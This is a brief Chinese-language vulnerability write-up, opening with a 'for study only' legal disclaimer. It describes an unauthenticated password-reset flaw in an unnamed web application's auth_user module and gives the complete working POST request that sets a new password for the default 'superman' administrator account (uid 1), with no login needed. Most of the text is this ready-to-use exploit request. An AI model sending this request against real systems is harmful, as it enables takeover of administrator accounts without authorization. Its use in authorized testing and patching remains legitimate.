請遵守網絡安全法!!!本文僅供學習交流使用!用於任何非授權滲透、非法目的攻擊、從事非法活動均與筆者無關!讀者自行承擔其惡果!
利用過程
無需登錄權限,由於修改密碼處未校驗原密碼,且/?module=auth_user&action=mod_edit_pwd
接口未授權訪問,造成直接修改任意用戶密碼。默認superman賬戶uid為1
數據包
POST /?module=auth_user&action=mod_edit_pwd
Cookie: username=superman;
uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1